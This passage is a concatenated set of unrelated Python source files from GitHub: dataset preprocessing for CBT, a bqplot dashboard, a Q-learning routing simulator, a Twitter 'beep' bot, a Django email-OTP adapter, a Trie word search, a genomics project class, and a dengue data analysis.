candidates:\n if w not in vocab and lookup.is_worthy(w):\n vocab.append(w)\n\n # add unk to candidates to keep shape at 10\n candidates = candidates + ['UNK']*(10 - len(candidates))\n\n # build word to index\n # w2i = { w:i for i,w in enumerate(vocab) }\n\n # assign special tokens to candidates\n for w in candidates:\n token_w = 'cand' + str(vocab.index(w))\n candidate_lookup[token_w] = w\n sample = sample.replace(w, token_w)\n\n #sample = rtext_pipeline(sample)\n\n # update vocabulary\n # obtain words from string(sample)\n # split sample into story and query\n story = ' '.join([ line.lstrip('0123456789') for line in sample.splitlines()[:-1] ])\n query = sample.splitlines()[-1].split('\\t')[0].lstrip('21')\n\n # run through raw text pipeline\n story = rtext_pipeline(story)\n query = rtext_pipeline(query)\n\n\n for w in (story + ' ' + query).split():\n if w not in vocab:\n if re.match('cand\\d+', w):\n continue\n vocab.append(w)\n\n #update the global lookup database\n lookup.i2w = vocab\n \n # vectorize sample\n data = {\n 'context' : vectorize_tree(story.split(), lookup),\n 'query' : vectorize_tree(query.split(), lookup),\n 'candidates' : vectorize_tree(candidates, lookup),\n 'answer' : vectorize_tree(answer, lookup)\n }\n\n # replace special tokens in vocab with actual words\n #for token, w in candidate_lookup.items():\n # vocab[vocab.index(token)] = w\n\n return data, lookup, candidate_lookup\n\n\n# init metadata\ndef init_metadata():\n return { \n 'max_candidates' : 10,\n 'clen' : 0,\n 'qlen' : 0\n }\n\n# update metadata\ndef update_metadata(metadata, data_item):\n metadata.update( {\n 'clen' : max(metadata['clen'], len(data_item['context'])),\n 'qlen' : max(metadata['qlen'], len(data_item['query']))\n } )\n return metadata\n\n\ndef process_file(filepath, lookup, metadata):\n # fetch samples from file\n samples = fetch_samples(filepath)\n\n # maintain vocabulary\n candidate_lookup = {}\n\n data = {}\n for k in FIELDS:\n data[k] = []\n\n # iterate through samples\n for sample in tqdm(samples):\n data_item, lookup, candidate_lookup = process_sample(sample,\n lookup, candidate_lookup)\n\n # update metadata\n metadata = update_metadata(metadata, data_item)\n\n for k in FIELDS:\n data[k].append(data_item[k])\n\n return data, lookup, metadata\n\n\ndef process():\n\n # currently we are working only on named entities\n filepath = {\n 'train' : '../../../datasets/CBTest/data/cbtest_NE_train.txt',\n 'test' : '../../../datasets/CBTest/data/cbtest_NE_valid_2000ex.txt',\n 'valid' : '../../../datasets/CBTest/data/cbtest_NE_test_2500ex.txt'\n }\n\n # maintain\n # 1. data\n # 2. (update) lookup -> vocabulary\n # 3. (update) metadata\n # for each tag (train, test, valid)\n data, metadata = {}, init_metadata()\n vocab = ['PAD', 'UNK']\n lookup = Dictionary(vocab)\n for tag in DSETS:\n data_, lookup, metadata = process_file(filepath[tag], lookup, metadata)\n data[tag] = data_\n\n # update lookup size in metadata\n metadata['vocab_size'] = len(lookup.i2w)\n\n # create w2i and i2w\n w2i = { w:i for i,w in enumerate(lookup.i2w) }\n\n lookup = { 'w2i' : w2i, 'i2w' : lookup.i2w }\n\n # save to disk\n serialize(data, PATH + 'data.NE')\n serialize(lookup, PATH + 'lookup.NE')\n serialize(metadata, PATH + 'metadata.NE')\n\n return data, lookup, metadata\n\n\ndef pad_data(data, metadata, truncate=False):\n\n clen = metadata['clen']\n qlen = metadata['qlen']\n\n padded_data = {}\n\n # for [train, test, valid]\n for dset in DSETS:\n # pad each field\n #padded_data[dset] = { k: pad_seq(v) for k,v in data[dset].items() }\n padded_data[dset] = sort_data({\n 'context' : pad_seq(data[dset]['context'], clen, \n truncate=True),\n 'query' : pad_seq(data[dset]['query'], qlen, \n truncate=True),\n 'answer' : pad_seq(reindex_answer(data[dset]['answer'], \n data[dset]['candidates'])),\n 'candidates' : pad_seq(data[dset]['candidates'], \n 10, truncate=True)\n })\n\n # add candidate mask over context\n padded_data[dset]['cmask'] = candidate_mask(padded_data[dset]['context'],\n padded_data[dset]['candidates'])\n\n return padded_data\n\n\ndef gather():\n\n for pickle_file in PICKLES:\n if not os.path.isfile(PATH + pickle_file):\n data, lookup, metadata = process()\n\n else:\n data, lookup, metadata = [read_pickle(PATH + pfile) \n for pfile in PICKLES]\n\n return pad_data(data, metadata), lookup, metadata\n\n\n\nif __name__ == '__main__':\n # run process -> get data\n process()\n","repo_name":"ai-guild/tensorsoup","sub_path":"tensorsoup/tasks/cbt/proc.py","file_name":"proc.py","file_ext":"py","file_size_in_byte":6468,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"14527394237","text":"from bqplot import (OrdinalScale, LinearScale, Bars, Lines, Label, Figure, Axis, ColorScale, CATEGORY10, ColorScale)\nimport ipywidgets as widgets\nimport bqplot as bqp\nimport pandas as pd\nimport numpy as np\n\nclass Tab1:\n \n def __init__(self, df):\n \n self.df = df\n self.widgets = dict() #dropdown and figs\n self.paras = dict() #X and Y\n \n self._init_update() \n\n \n \n def _init_update(self):\n \n self.widgets['dropdown'] = widgets.Dropdown(description='Frequency', options=['Year', 'Quarter', 'Month'])\n self.widgets['dropdown'].value = 'Year'\n self.widgets['dropdown'].observe(self._plot_update, 'value')\n \n self._data_process(self.df)\n \n self._plot_fig11(self.paras['plt_year_class_x'], self.paras['plt_year_y'])\n self._plot_fig12(self.paras['plt_year_class_x'], self.paras['plt_year_class_y'], \n self.paras['df_year_class'])\n \n self.widgets['tab1'] = widgets.VBox([self.widgets['dropdown'],\n self.widgets['fig11']\n ,self.widgets['fig12']\n ])\n \n \n \n def _data_process(self, df):\n \n self.paras['df_year_class'] = pd.pivot_table(df, values='Transaction Id', \n index=['by_yr'], columns=['Class Number'],\n aggfunc='count', fill_value=0)\n self.paras['df_qrt_class'] = pd.pivot_table(df, values='Transaction Id', \n index=['by_qrt'], columns=['Class Number'],\n aggfunc='count', fill_value=0)\n self.paras['df_mon_class'] = pd.pivot_table(df, values='Transaction Id', \n index=['by_mon'], columns=['Class Number'],\n aggfunc='count', fill_value=0)\n \n \n# self.paras['plt_year_class_x'] = self.paras['df_year_class'].index.strftime('%Y')\n self.paras['plt_year_class_x'] = np.array(list(self.paras['df_year_class'].index))\n self.paras['plt_year_class_y'] = np.array(self.paras['df_year_class']).T\n self.paras['plt_year_y'] = np.array(self.paras['df_year_class']).sum(axis=1)\n\n# self.paras['plt_qrt_class_x'] = self.paras['df_qrt_class'].index.strftime('%YQ%q')\n self.paras['plt_qrt_class_x'] = np.array(list(self.paras['df_qrt_class'].index))\n self.paras['plt_qrt_class_y'] = np.array(self.paras['df_qrt_class']).T\n self.paras['plt_qrt_y'] = np.array(self.paras['df_qrt_class']).sum(axis=1)\n\n# self.paras['plt_mon_class_x'] = self.paras['df_mon_class'].index.strftime('%Y-%m')\n self.paras['plt_mon_class_x'] = np.array(list(self.paras['df_mon_class'].index))\n self.paras['plt_mon_class_y'] = np.array(self.paras['df_mon_class']).T\n self.paras['plt_mon_y'] = np.array(self.paras['df_mon_class']).sum(axis=1)\n \n\n \n \n \n def _plot_fig11(self, plt_x, plt_y):\n \n x_ord = OrdinalScale(domain=list(plt_x))\n y_sc = LinearScale(max=plt_y.max()*1.1)\n \n plot11 = Bars(x=plt_x, y=plt_y, scales={'x':x_ord, 'y':y_sc}, colors=['#3399ff'],\n tooltip=bqp.Tooltip(fields=['x', 'y'], labels=['Date', 'Reads']))\n plot11.stroke = 'black'\n plot11.align = 'center'\n \n mark_text = Label(x=plt_x,\n y=plt_y,\n align='middle',\n font_weight='normal',\n y_offset=-10,\n colors=['white'],\n default_size=12,\n scales={'x': x_ord, 'y': y_sc},\n text=plt_y #[value for value in bar_label]\n )\n \n xax11 = Axis(scale=x_ord, grid_lines='none', num_ticks=10)\n yax11 = Axis(scale=y_sc, tick_format=',d', grid_lines='none', orientation='vertical')\n \n #Axis(**kwargs)\torientation, side, label, tick_format, scale, num_ticks, \n #tick_values, label_location, label_color, grid_lines, grid_color, color, label_offset, visible\n \n self.widgets['fig11'] = Figure(marks=[plot11, mark_text], axes=[xax11, yax11], padding_x=0.025, padding_y=0.025)\n self.widgets['fig11'].layout.width = '800px'\n self.widgets['fig11'].layout.height = '300px'\n self.widgets['fig11'].title = 'Readership data by Year'\n \n \n\n def _plot_fig12(self, plt_x, plt_y, df_year_class):\n \n x_ord = OrdinalScale()\n y_sc = LinearScale()\n \n #The 'marker' trait of a Lines instance must be any of \n #['circle', 'cross', 'diamond', 'square', 'triangle-down', 'triangle-up', 'arrow', 'rectangle', 'ellipse'] or None\n plot12 = Lines(x=plt_x, y=plt_y, scales={'x':x_ord, 'y':y_sc}, \n tooltip=bqp.Tooltip(fields=['x', 'y'], labels=['Date', 'Reads']),\n colors=CATEGORY10, marker='circle',\n display_legend=True,\n labels=['Class ' + s for s in df_year_class.columns])\n\n #Axes\n xax11 = Axis(scale=x_ord, grid_lines='none', num_ticks=10)\n yax11 = Axis(scale=y_sc, tick_format=',d', grid_lines='none', orientation='vertical') \n \n #Axis(**kwargs)\torientation, side, label, tick_format, scale, num_ticks, \n #tick_values, label_location, label_color, grid_lines, grid_color, color, label_offset, visible\n \n self.widgets['fig12'] = Figure(marks=[plot12], axes=[xax11, yax11], padding_x=0.025, padding_y=0.025)\n \n self.widgets['fig12'].layout.width = '800px'\n self.widgets['fig12'].layout.height = '300px'\n \n\n def _plot_update(self, *args): #only consider change frequency\n selected_freq = self.widgets['dropdown'].value\n\n # update the y attribute of the mark by selecting \n # the column from the price data frame\n try:\n if selected_freq == 'Year':\n self.widgets['fig11'].axes[0].scale.domain = list(self.paras['plt_year_class_x'])\n self.widgets['fig11'].axes[1].scale.max=self.paras['plt_year_y'].max()*1.1\n self.widgets['fig11'].marks[1].x = self.paras['plt_year_class_x']\n self.widgets['fig11'].marks[1].y = self.paras['plt_year_y']\n self.widgets['fig11'].marks[1].text = self.paras['plt_year_y']\n self.widgets['fig11'].marks[0].x = self.paras['plt_year_class_x']\n self.widgets['fig11'].marks[0].y = self.paras['plt_year_y']\n self.widgets['fig12'].marks[0].x = self.paras['plt_year_class_x']\n if len(self.paras['plt_year_class_x'])>1:\n self.widgets['fig12'].marks[0].y = self.paras['plt_year_class_y']\n else:\n self.widgets['fig12'].marks[0].y = self.paras['plt_year_class_y'][0]\n elif selected_freq == 'Quarter':\n self.widgets['fig11'].axes[0].scale.domain = list(self.paras['plt_qrt_class_x'])\n self.widgets['fig11'].axes[1].scale.max=self.paras['plt_qrt_y'].max()*1.1\n self.widgets['fig11'].marks[1].x = self.paras['plt_qrt_class_x']\n self.widgets['fig11'].marks[1].y = self.paras['plt_qrt_y']\n self.widgets['fig11'].marks[1].text = self.paras['plt_qrt_y']\n self.widgets['fig11'].marks[0].x = self.paras['plt_qrt_class_x']\n self.widgets['fig11'].marks[0].y = self.paras['plt_qrt_y']\n self.widgets['fig12'].marks[0].x = self.paras['plt_qrt_class_x']\n self.widgets['fig12'].marks[0].y = self.paras['plt_qrt_class_y']\n elif selected_freq == 'Month':\n self.widgets['fig11'].axes[0].scale.domain = list(self.paras['plt_mon_class_x'])\n self.widgets['fig11'].axes[1].scale.max=self.paras['plt_mon_y'].max()*1.1\n self.widgets['fig11'].marks[1].x = self.paras['plt_mon_class_x']\n self.widgets['fig11'].marks[1].y = self.paras['plt_mon_y']\n self.widgets['fig11'].marks[1].text = self.paras['plt_mon_y']\n self.widgets['fig11'].marks[0].x = self.paras['plt_mon_class_x']\n self.widgets['fig11'].marks[0].y = self.paras['plt_mon_y']\n self.widgets['fig12'].marks[0].x = self.paras['plt_mon_class_x']\n self.widgets['fig12'].marks[0].y = self.paras['plt_mon_class_y']\n except:\n pass\n finally:\n # update the title of the figure\n if selected_freq == 'Year':\n self.widgets['fig12'].marks[0].labels = ['Class ' + s for s in self.paras['df_year_class'].columns]\n elif selected_freq == 'Quarter':\n self.widgets['fig12'].marks[0].labels = ['Class ' + s for s in self.paras['df_qrt_class'].columns]\n elif selected_freq == 'Month':\n self.widgets['fig12'].marks[0].labels = ['Class ' + s for s in self.paras['df_mon_class'].columns]\n self.widgets['fig11'].title = 'Readership data by {}'.format(selected_freq)\n# self.widgets['fig11'].marks[1].align = \"middle\"\n \n \n def _plot_fig1_update(self, df): #consider change year, class\n \n self._data_process(df)\n self._plot_update()\n \n \n def show(self):\n return self.widgets['tab1']\n \n ","repo_name":"angang0123/my_project","sub_path":"Usage/Scripts/tab1.py","file_name":"tab1.py","file_ext":"py","file_size_in_byte":9636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6492566147","text":"import networkx as nx\nimport numpy as np\nimport itertools\nimport matplotlib.pyplot as plt\nimport gym\nimport ql\nimport time\n\nG1=nx.DiGraph()\nlist_nodes = [1,2,3,4,5,6,7,8,9,10] #### pocisiones [0,1,2,3,4]\nacciones = list_nodes\nActionsx1= [2,3] #### acciones posibles para cada nodo\nActionsx2= [2,5]\nActionsx3= [0,1,3,4,5]\nActionsx4= [0,2,4,6,7]\nActionsx5= [2,3,5,7,8]\nActionsx6= [1,2,4,8,9]\nActionsx7= [3,7]\nActionsx8= [3,4,6,8]\nActionsx9= [4,5,7,9]\nActionsx10= [5,8]\n\nG1.add_nodes_from(list_nodes)\nG1.nodes()\n\n#weights = [50,90,50,90,50,50,50,50,50,50,50,50,50,50,50,50,50,50]\nweights = [50,90,50,90,50,90,50,50,50,90,50,50,50,50,90,50,50,50]\nlist_arcs1 = [(1,3,weights[0]), (3,1,weights[0]), (1,4,weights[1]) , (4,1,weights[1]) , (2,3,weights[2]), (3,2,weights[2]) , (2,6,weights[3]) , (6,2,weights[3]) , (3,4,weights[4]) , (4,3,weights[4]) , (3,5,weights[5]) , (5,3,weights[5]) , (3,6,weights[6]) , (6,3,weights[6]) ,(4,5,weights[7]), (5,4,weights[7]), (5,6,weights[8]), (6,5,weights[8]), (4,7,weights[9]), (7,4,weights[9]), (4,8,weights[10]), (8,4,weights[10]), (5,8,weights[11]), (8,5,weights[11]), (5,9,weights[12]), (9,5,weights[12]), (6,9,weights[13]), (9,6,weights[13]), (6,10,weights[14]), (10,6,weights[14]), (7,8,weights[15]), (8,7,weights[15]), (8,9,weights[16]), (9,8,weights[16]), (9,10,weights[17]), (10,9,weights[17])]\nG1.add_weighted_edges_from(list_arcs1)\nG1.edges()\n\nG1.nodes[1]['pos'] = (0,-2)\nG1.nodes[2]['pos'] = (0,2)\nG1.nodes[3]['pos'] = (2.5,0)\nG1.nodes[4]['pos'] = (5,-5)\nG1.nodes[5]['pos'] = (6,0)\nG1.nodes[6]['pos'] = (5,5)\nG1.nodes[7]['pos'] = (10,-9)\nG1.nodes[8]['pos'] = (10,-3)\nG1.nodes[9]['pos'] = (10,3)\nG1.nodes[10]['pos'] = (10,9)\n\nnode_pos=nx.get_node_attributes(G1,'pos')\nnx.draw_networkx(G1, node_pos,node_size=450)\narc_weight=nx.get_edge_attributes(G1,'weight')\nnx.draw_networkx_edge_labels(G1, node_pos, edge_labels=arc_weight)\n\n\nl=[[1,2,3,4,5,6,7,8,9,10], [7,8,9,10], ['E','R']]\ns = list(itertools.product(*l))\nbandera=s\nprint(bandera)\n\ndef pesoEnlace(est, a):\n origen = bandera[est][0] \n destino = a + 1\n for x in range(0,len(list_arcs1)):\n if (list_arcs1[x][0] == origen and list_arcs1[x][1] == destino):\n peso = list_arcs1[x][2]\n return peso \n\ndef randomWeight():\n pesos = np.random.randint(20, 70, size=16)\n return pesos\n\ndef reset():\n aleatorio = np.random.randint(0, 80, size=1)\n return aleatorio[0]\ndef resetTest():\n aleatorio = np.random.randint(0, 16, size=1)\n return aleatorio[0]\ndef render(col,cond):\n map = []\n for node in G1:\n if node in col and cond == 'R':\n map.append('green')\n elif node in col and cond == 'E':\n map.append('red')\n else:\n map.append('gray')\n #nx.draw(G1, node_color=map, with_labels=True)\n nx.draw_networkx(G1, node_pos,node_size=450,node_color=map)\n nx.draw_networkx_edge_labels(G1, node_pos, edge_labels=arc_weight)\n plt.show() \n \n \ndef ActionsXorigen(a1 ,a2 ,a3 ,a4 ,a5, a6, a7, a8, a9, a10 ,origen): \n if (origen==1):\n return a1\n elif (origen==2):\n return a2\n elif (origen==3):\n return a3\n elif (origen==4):\n return a4\n elif (origen==5):\n return a5\n elif (origen==6):\n return a6\n elif (origen==7):\n return a7\n elif (origen==8):\n return a8\n elif (origen==9):\n return a9\n else:\n return a10\n \ndef step(s, a, posiblesAcciones, G1, saltos, _s):\n info={}\n imposibles = 0\n for x in range(0,len(posiblesAcciones)):\n if (a == posiblesAcciones[x]):\n imposibles = 1 \n if(imposibles == 0): # el destino no s vecino o se queda quieto\n reward = -70\n s_ = s\n done = False\n else:\n if (bandera[s][0] == bandera [s][1]):\n reward = 100\n s_ = s\n done = True\n \n else:\n done = False\n suma = a + 1\n for x in range(0,len(bandera)):\n if (suma == bandera[x][0] and bandera[s][1] == bandera[x][1] and bandera[s][2] == bandera[x][2]):\n s_ = x\n break\n #print(bandera[s][0], suma)\n #print (p)\n #if (bandera[s][2]==\"E\"): \n if (s_ == _s):\n reward = -130\n else:\n reward = -10* saltos\n if (bandera[s][0] == 1 and bandera[s][1] == 10 and a == 2 or bandera[s][0] == 2 and bandera[s][1] == 7 and a == 2):\n reward = reward + 3\n if (bandera[s][2] == 'E'):\n if (pesoEnlace(s, a) > 79):\n reward = reward - 130\n \n \n #print (bandera[s],a,posiblesAcciones,s_,reward)\n _s = s\n return _s,s_,reward,done,info\n\n\nif __name__ ==\"__main__\":\n t = time.time()\n alpha = 0.4\n gamma = 0.999\n epsilon = 0.976\n episodes = 400000\n max_steps = 2500\n n_tests = 16\n n_states, n_actions = 80, 10\n agente = ql.QL_agent(alpha, gamma, epsilon, n_states,n_actions) #(alpha, gamma, epsilon, episodes, n_states, n_actions)\n \n episode_rewards = []\n \n for episode in range(episodes):\n print(\"Episode: {0}\".format(episode))\n s = reset() \n _s = s\n episode_reward = 0\n steps = 0\n done = False\n while steps < max_steps:\n steps += 1 \n a = agente.take_action(s,True)\n o = bandera[s][0] #origen\n acc = ActionsXorigen(Actionsx1,Actionsx2,Actionsx3,Actionsx4,Actionsx5,Actionsx6,Actionsx7,Actionsx8,Actionsx9,Actionsx10,o) #acciones para dicho origen \n _s, s_, reward, done, info = step(s,a,acc,G1,steps,_s)\n #print(bandera[s],a,acc,s_,reward)\n episode_reward += reward\n a_ = np.argmax(agente.Q[s_,:])\n agente.updateQ(reward,s,a,a_,s_,done) \n s, a = s_ , a_\n if done:\n end_ep = time.time()\n episode_rewards.append(episode_reward)\n break \n print(bandera)\n print(acciones)\n #Test model \n \n for test in range(n_tests):\n print(\"Test #{0}\".format(test))\n s = test #######################################reset\n _s = s\n done = False\n epsilon = 0\n st=0\n steps = 0\n color=[]\n while True:\n time.sleep(1)\n o = bandera[s][0] #origen\n acc = ActionsXorigen(Actionsx1,Actionsx2,Actionsx3,Actionsx4,Actionsx5,Actionsx6,Actionsx7,Actionsx8,Actionsx9,Actionsx10,o)\n #env.render()\n steps += 1\n if(st == 0):\n first_state=False;\n else:\n first_state=True;\n print(\"Estado actual: {0}\".format(bandera[s]))\n color.append(bandera[s][0])\n a = agente.take_action(s,first_state)\n print(\"Chose action {0} for state {1}\".format(a,s))\n #print(_s, s)\n first_state=True\n st=st+1;\n _s, s, reward, done, info = step(s,a,acc,G1,steps,_s)\n print(acc,reward,done)\n if done:\n render(color,bandera[s][2])\n print(\"Reached goal!\")\n color.clear()\n break \n time.sleep(6)\n \n plt.xlabel(\"Episodes\")\n plt.ylabel(\"Reward\")\n plt.title(\"\")\n plt.plot(episode_rewards,'b')\n plt.legend()\n plt.show() \n \"\"\" \n print(bandera)\n print(acciones)\n \n \"\"\"\n \n ","repo_name":"davidcamilo0710/Routing_Reinforcement_Learning","sub_path":"routing.py","file_name":"routing.py","file_ext":"py","file_size_in_byte":7745,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"40061686780","text":"import random\nfrom random import randint\nimport numpy\nimport requests\nimport tweepy\n\nfrom secrets import *\n\n#TODO: tweet every 3 hours\n\n# ---------- CLASS DECLARATIONS ----------\n\n# contains beeps\nclass Word:\n def __init__(self, string, max):\n self.string = string\n self.max = max\n\n# ---------- VARIABLE DECLARATIONS ----------\n\nbeeps = [\n # in order of probability\n Word(\"beep\", 3),\n Word(\"boop\", 3),\n Word(\"bleep\", 3),\n Word(\"bwoop\", 2),\n Word(\"woop\", 1),\n Word(\"bweep\", 1),\n Word(\"deet\", 2),\n Word(\"doot\", 3),\n Word(\"weeo\", 1),\n Word(\"bop\", 2),\n Word(\"bawoop\", 2),\n Word(\"badeep\", 2),\n Word(\"badoop\", 2)\n]\n\nrares = [\n Word(\"Poe[!/?]\", 1) #(1/100)\n]\n\nsounds = [\n Word(\"*bonk*\", 3),\n Word(\"*ding*\", 2),\n Word(\"*whir*\", 3),\n Word(\"*zzzt*\", 1),\n]\n\n# ---------- MAIN ----------\n\n# create an OAuthHandler instance\n# Twitter requires all requests to use OAuth for authentication\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_secret)\napi = tweepy.API(auth) # create an API object\n\n\ndef tweet():\n # create list of all beeps and sounds, multiplied by max use\n allBeeps = generateExpandedList(beeps)\n allWords = allBeeps + generateExpandedList(sounds)\n\n # start with random word\n phrase = [selectRandomWord(allWords)]\n\n dieRoll = randint(0, 2)\n\n if dieRoll >= 1:\n # add another word\n phrase.append(selectRandomWord(allWords))\n\n if dieRoll is 2:\n # add another word\n phrase.append(selectRandomWord(allWords))\n\n\n # Shuffle array\n random.shuffle(phrase)\n\n # Capitalize first letter\n phrase[0].title()\n\n # Add spaces between words\n phrase = ' '.join(phrase)\n\n # Update the authenticated user's status\n api.update_status(status=phrase)\n\n\n# ---------- HELPER FUNCTIONS ----------\n\n# remove and return a random beep from wordList\ndef selectRandomWord(wordList):\n # TODO: probability distribution\n beep = random.choice(wordList)\n wordList.remove(beep)\n return beep\n\n\ndef generateExpandedList(wordList):\n expandedList = []\n for word in wordList:\n expandedList += [word.string] * word.max\n return expandedList\n\n\ndef lengthenWord(word):\n return word[0:-2] + (word[-2] * randint(1, 5)) + word[-1] # multiply second last letter by 1-5\n\n\ntweet()\n","repo_name":"cartercook/Beep_Beep_8","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9703167134","text":"from allauth.account.adapter import DefaultAccountAdapter\nfrom django.contrib.sites.shortcuts import get_current_site\n\nfrom .models import EmailOTP\n\n\nclass UserAdapter(DefaultAccountAdapter):\n\n def send_confirmation_mail(self, request, emailconfirmation, signup):\n current_site = get_current_site(request)\n # activate_url = self.get_email_confirmation_url(\n # request,\n # emailconfirmation)\n otp = EmailOTP.objects.generate(emailconfirmation.email_address.user.id)\n ctx = {\n \"user\": emailconfirmation.email_address.user,\n \"current_site\": current_site,\n \"key\": otp.code,\n }\n if signup:\n email_template = 'account/email/email_confirmation_signup'\n else:\n email_template = 'account/email/email_confirmation'\n self.send_mail(email_template,\n emailconfirmation.email_address.email,\n ctx)\n","repo_name":"devna-dev/durar-backend","sub_path":"alshamelah_api/apps/users/adapter.py","file_name":"adapter.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"44112533410","text":"from calendar import c\r\n\r\n\r\nvar = float(input(\"Entre com um valor maior que 20. Digite um menor para parar o programa: \"))\r\nprint(var)\r\n\r\nmaiorAtual = var\r\nmenorAtual = var\r\n\r\n\r\nwhile var>=20:\r\n var = float(input(\"Entre com um valor maior que 20. Digite um menor para parar o programa: \"))\r\n\r\n if var > maiorAtual:\r\n maiorAtual = var\r\n\r\n if var < menorAtual:\r\n menorAtual = var\r\n\r\nprint(\"voltei normalmente para o programa.\")\r\n\r\nprint(f\"O maior é: {maiorAtual}\")\r\nprint(f\"O menor é: {menorAtual}\")\r\n","repo_name":"LuisAbrantes/PythonClassFirstYear","sub_path":"classes/class056.py","file_name":"class056.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"4690013191","text":"class Solution:\n def findWords(self, board: List[List[str]], words: List[str]) -> List[str]:\n result = []\n root = self.setTrie(words)\n \n for i in range(len(board)):\n for j in range(len(board[0])):\n self.dfs(root, i, j, result, board)\n \n return result\n \n \n def setTrie(self, words):\n root = {}\n for word in words:\n curr_node = root\n for char in word:\n if char not in curr_node:\n curr_node[char] = {}\n curr_node = curr_node[char]\n curr_node['word'] = word\n return root\n\n\n def dfs(self, node, i, j, result, board):\n if 'word' in node:\n result.append(node['word'])\n del node['word']\n \n if i < 0 or j < 0 or i >= len(board) or j >= len(board[0]):\n return\n if board[i][j] not in node:\n return\n \n char = board[i][j]\n board[i][j] = '#'\n self.dfs(node[char], i + 1, j, result, board)\n self.dfs(node[char], i - 1, j, result, board)\n self.dfs(node[char], i, j + 1, result, board)\n self.dfs(node[char], i, j - 1, result, board)\n board[i][j] = char\n\n\n","repo_name":"gilsun/leetcode","sub_path":"0212-word-search-ii/0212-word-search-ii.py","file_name":"0212-word-search-ii.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16426488572","text":"import click\nimport os\nimport os.path\nimport sys\nimport random\nimport string\nimport itertools\nimport time\nimport platform\nimport yaml\n\nfrom .hichipperHelp import *\n\nclass hichipperProject():\n\tdef __init__(self, script_dir, mode, out, peaks, restriction_frags,\n\t\tskip_resfrag_pad, skip_background_correction):\n\t\t\n\t\t#-----------------------------------------\n\t\t# Potentially parse .yaml file if supplied\n\t\t#-----------------------------------------\n\t\tif mode.endswith(('.yaml', '.yml')):\n\t\t\tm = parse_manifest(mode)\n\t\t\tself.peaks = m['peaks'][0]\n\t\t\tself.resfrags = m['resfrags'][0]\n\t\t\tself.hicprooutput = m['hicpro_output'][0]\n\t\t\tself.go = \"yaml\"\n\t\telse:\n\t\t\tself.go = \"call\"\n\t\t\tself.peaks = peaks\n\t\t\tself.resfrags = restriction_frags\n\t\t\n\t\t#------------------------------\n\t\t# Determine if restriction fragment calling is happening or not\n\t\t#------------------------------\n\t\tif not (skip_resfrag_pad or skip_background_correction):\n\t\t\tif not os.path.isfile(self.resfrags):\n\t\t\t\tsys.exit('ERROR: Could not find the restriction fragment file ' + self.resfrags + '; either correctly specify file in .yaml; use the --skip-resfrag-pad and --skip-background-correction flags; or supply them directly with the `--restriction-frags` flag')\n\t\n\t\t#----------------------------------\n\t\t# Assign straightforward attributes\n\t\t#----------------------------------\n\t\tself.script_dir = script_dir\n\t\tself.mode = mode\n\t\tself.out = out\n\t\t\n\t\t\n\t#--------------------------------------------------------------------------------\n\t# Define a method to dump the object as a .yaml/dictionary for use in other files\n\t#--------------------------------------------------------------------------------\n\tdef __iter__(self):\n\t\t\n\t\tyield 'script_dir', self.script_dir\n\t\tyield 'mode', self.mode\n\t\tyield 'output', self.output\n\t\tyield 'bamfile', self.bamfile\n\n\t\tyield 'cluster', self.cluster\n\t\tyield 'jobs', self.jobs\n\t\tyield 'minimum_barcode_fragments', self.minimum_barcode_fragments\n\t\tyield 'minimum_cell_fragments', self.minimum_cell_fragments\n\t\t\n\t\tyield 'extract_mito', self.extract_mito\n\t\tyield 'tssFile', self.tssFile\n\t\tyield 'blacklistFile', self.blacklistFile\n\t\tyield 'bedtoolsGenomeFile', self.bedtoolsGenomeFile\n\t\tyield 'R', self.R\n\t\t\n\t\tyield 'barcode_tag', self.barcode_tag\n\t\tyield 'bam_name', self.bam_name\n\t\t\n\t\tyield 'bowtie2', self.bowtie2\n\t\tyield 'bowtie2_index', self.bowtie2_index\n\t\t\n\t","repo_name":"aryeelab/hichipper","sub_path":"hichipper/hichipperProjectClass.py","file_name":"hichipperProjectClass.py","file_ext":"py","file_size_in_byte":2359,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"37"} +{"seq_id":"35204418341","text":"#!/usr/bin/python\n\nfrom pandas import *\nfrom numpy import *\nfrom pandasql import *\nfrom matplotlib.pyplot import *\n\nfrom utilidades import linreg\n\nimport seaborn as sns\n\n# melhorar visual dos graficos\nsns.set(style='whitegrid')\n\n# importar dados\ncsv = 'dados/dados-fixed.csv'\n\ndfDengue = read_csv(csv)\n\n# lista de estados\nq = \"\"\"\n\tSELECT uf FROM dfDengue\n\t\tWHERE\n\t\t\tano >= 1994 AND\n\t\t\tano <= 2013\n\t\tGROUP BY uf\n\t\"\"\"\n\nestados = sqldf(q, globals())\n\n# medias e desvios para graficos\nfor estado in estados.uf:\n\n\t# medicos\n\testados.loc[(estados.uf == estado), 'media_medicos'] =\\\n\t\tmean(dfDengue[dfDengue.uf == estado].medicos_mil_hab)\n\testados.loc[(estados.uf == estado), 'std_medicos'] =\\\n\t\tstd(dfDengue[dfDengue.uf == estado].medicos_mil_hab, ddof=1)\n\n\t# leitos\n\testados.loc[(estados.uf == estado), 'media_leitos'] =\\\n\t\tmean(dfDengue[dfDengue.uf == estado].leitos_mil_hab)\n\testados.loc[(estados.uf == estado), 'std_leitos'] =\\\n\t\tstd(dfDengue[dfDengue.uf == estado].leitos_mil_hab, ddof=1)\n\n\t# casos de dengue\n\testados.loc[(estados.uf == estado), 'media_dengue_cem_mil_hab'] =\\\n\t\tmean(dfDengue[dfDengue.uf == estado].dengue_cem_mil_hab)\n\testados.loc[(estados.uf == estado), 'std_dengue_cem_mil_hab'] =\\\n\t\tstd(dfDengue[dfDengue.uf == estado].dengue_cem_mil_hab, ddof=1)\n\n\t# casos de 